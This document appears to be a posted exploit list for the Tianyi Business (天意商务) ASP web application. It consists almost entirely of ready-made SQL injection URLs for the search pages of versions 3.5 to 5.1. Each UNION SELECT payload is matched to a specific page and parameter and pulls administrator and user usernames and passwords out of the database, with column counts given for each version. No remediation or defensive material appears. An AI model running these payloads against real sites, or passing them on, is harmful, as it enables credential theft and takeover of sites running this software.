Source: 非安全
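**************************************************************************
*                                                                        *
* 天意商务 (Tianyi Business) program: exploit strings for some search pages *
*                                                                        *
**************************************************************************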
=====================================================
Business opportunities // web page: syjh
--------------------------
search.asp
--------------------------
Submitted via the txtitle parameter
Administrator:
Version 5.1: 24 columns
http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from manage_user where id between 1 and 20 union select * from info where showname like '%jm
Version 4.5: 23 columns
http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from manage_user where id between 1 and 20 union select * from info where showname like '%jm
Version 3.5: 22 columns
http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from manage_user where id between 1 and 20 union select * from info where showname like '%jm
Users:
http://127.0.0.1/ty51/syjh/search.asp?txtitle=jm%' union select 1,user,3,4,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from qyml where id between 1 and 20 union select * from info where showname like '%jm
---------------------------
Submitted via the type parameter
Administrator:
http://127.0.0.1/ty51/syjh/search.asp?type=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from manage_user where id between 1 and 20 union select * from info where type like '%jm
Users:
http://127.0.0.1/ty51/syjh/search.asp?type=jm%' union select 1,user,3,4,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from qyml where id between 1 and 20 union select * from info where type like '%jm
----------------------------
info table: 24 columns in version 5.1, 23 columns in version 4.5, 22 columns in version 3.5
========================================
sjsearch.asp in the syjh directory
-------------------------------
Submitted via the txtitle parameter
Administrator:
http://127.0.0.1/ty51/syjh/sjsea ... 788&txtitle=jm%' union select 1,2,username,password,5,6,7,8,9,10 from manage_user where id between 1 and 20 union select type,Info_ID,showname,dateandtime,web,gsid,company,country,city,content from info where showname like '%jm
-----------------------------------
Version 5.1: 10 columns; version 4.5: 10 columns; version 3.5: 22 columns
-----------------------------------
Submitted via the type parameter
Administrator:
http://127.0.0.1/ty51/syjh/sjsearch.asp?type=采购&keyword=0&datetime=7788&txtitle=jm%'%20union%20select%201,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20manage_user where id between 1 and 20 union%20select%20*%20from%20info%20where%20showname%20like%20'%jm
-------------------------------------
Version 5.1: 24 columns; version 4.5: 10 columns; version 3.5: 22 columns
-------------------------------------
*********************************************
Product showcase: spzs
-----------------------------------
search.asp
----------------------------------
Administrator:
http://127.0.0.1/ty51/spzs/search.asp?txtitle=jm%' union select 1,2,username,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from manage_user where id between 1 and 20 union select * from spzs where cpmc like '%jm
------------------------------------
Version 5.1: 29 columns; version 4.5: 28 columns; version 3.5: 28 columns
**********************************************
Company directory: qyml
---------------------------------------
qyml.asp
---------------------------------------
Submitted via the txtitle parameter
Administrator:
http://127.0.0.1/ty51/qyml/qyml.asp?txtitle=jm'% union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where qymc like '%jm
----------------------------------------
Submitted via the qylb parameter
Administrator:
http://127.0.0.1/ty51/qyml/qyml.asp?qylb=jm'% union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where qylb like '%jm
------------------------------------------
Submitted via the sf parameter
Administrator:
http://127.0.0.1/ty51/qyml/qyml.asp?sf=jm'% union select 1,2,3,username,password,6,7,8,9,10 from manage_user where id between 1 and 20 union select flag,url,id,qymc,zycp,sf,web,city,jygs,idate from qyml where sf like '%jm
-----------------------------------------
Version 5.1: 10 columns; version 3.5: 46 columns; version 4.5: 46 columns
------------------------------------------
Exploiting search.asp
------------------------------------------
Submitted via the txtitle parameter
Administrator:
http://127.0.0.1/ty51/qyml/search.asp?sortid=1&txtitle=jm%' union select 1,2,3,4,username,password,7,8,9,10,11 from manage_user where id between 1 and 20 union select flag,url,id,qymc,qorder,zycp,sf,web,city,jygs,idate from qyml where qymc like '%jm
-------------------------------------------
Submitted via the qylb parameter
Administrator:
http://127.0.0.1/ty51/qyml/search.asp?sortid=1&qylb=jm%' union select 1,2,3,4,username,password,7,8,9,10,11 from manage_user where id between 1 and 20 union select flag,url,id,qymc,qorder,zycp,sf,web,city,jygs,idate from qyml where qylb like '%jm
-------------------------------------------
Version 5.1: 11 columns; version 4.5: 46 columns; version 3.5: 46 columns
***********************************************
Industry information: hyxx
--------------------------------------
more.asp
-------------------------------------
Submitted via the txtitle parameter; only one column is displayed.
Administrator name:
http://127.0.0.1/ty51/hyxx/more.asp?typeid=0&txtitle=jm'% union select 1,username,3,4,5,6,7,8,9,10,11 from manage_user where id between 1 and 20 union select * from hyxx where content like '%jm
Administrator password:
http://127.0.0.1/ty51/hyxx/more.asp?typeid=0&txtitle=jm'% union select 1,password,3,4,5,6,7,8,9,10,11 from manage_user where id between 1 and 20 union select * from hyxx where content like '%jm
-------------------------------------
hyxx table: 11 columns in version 5.1, 11 columns in version 4.5, 11 columns in version 3.5
---------------------------------------
*****************************************
Job market: job/
----------------------------------------
jobsearch.asp
----------------------------------------
Submitted via the txtitle parameter
Administrator:
http://127.0.0.1/ty51/job/jobsearch.asp?txtitle=jm%'%20union%20select%201,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20manage_user where id between 1 and 20 union%20select%20*%20from%20job%20where%20showname%20like%20'%jm
-----------------------------------------
Submitted via the type parameter
Administrator:
http://127.0.0.1/ty51/job/jobsearch.asp?type=jm%' union select 1,username,3,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from manage_user where id between 1 and 20 union select * from job where type like '%jm
-------------------------------------------
Version 5.1: 22 columns; version 4.5: 21 columns; version 3.5: 21 columns
-------------------------------------------
psearch.asp
------------------------------------------
Submitted via the txtitle parameter
Administrator:
http://127.0.0.1/ty51/job/psearch.asp?txtitle=jm%' union select 1,2,3,4,5,username,7,8,9,10,11,12,password,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from manage_user where id between 1 and 20 union select * from person where zye like '%jm
Users:
http://127.0.0.1/ty51/job/psearch.asp?txtitle=jm%' union select 1,2,3,4,5,user,7,8,9,10,11,12,pass,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from qyml where id between 1 and 20 union select * from person where zye like '%jm
-------------------------------------------
Version 5.1: 30 columns; version 4.5: 30 columns; version 3.5: 30 columns
-------------------------------------------
*************************************************
Business services: qyfw/
-----------------------------------------
more.asp
----------------------------------------
Submitted via the txtitle parameter; only one column is displayed.
Administrator name:
http://127.0.0.1/ty51/qyfw/more.asp?typeid=0&txtitle=jm%' union select 1,username,3,4,5,6,7,8,9 from manage_user where id between 1 and 20 union select * from Commerce where content like '%jm
Administrator password:
http://127.0.0.1/ty51/qyfw/more.asp?typeid=0&txtitle=jm%' union select 1,password,3,4,5,6,7,8,9 from manage_user where id between 1 and 20 union select * from Commerce where content like '%jm
**************************************************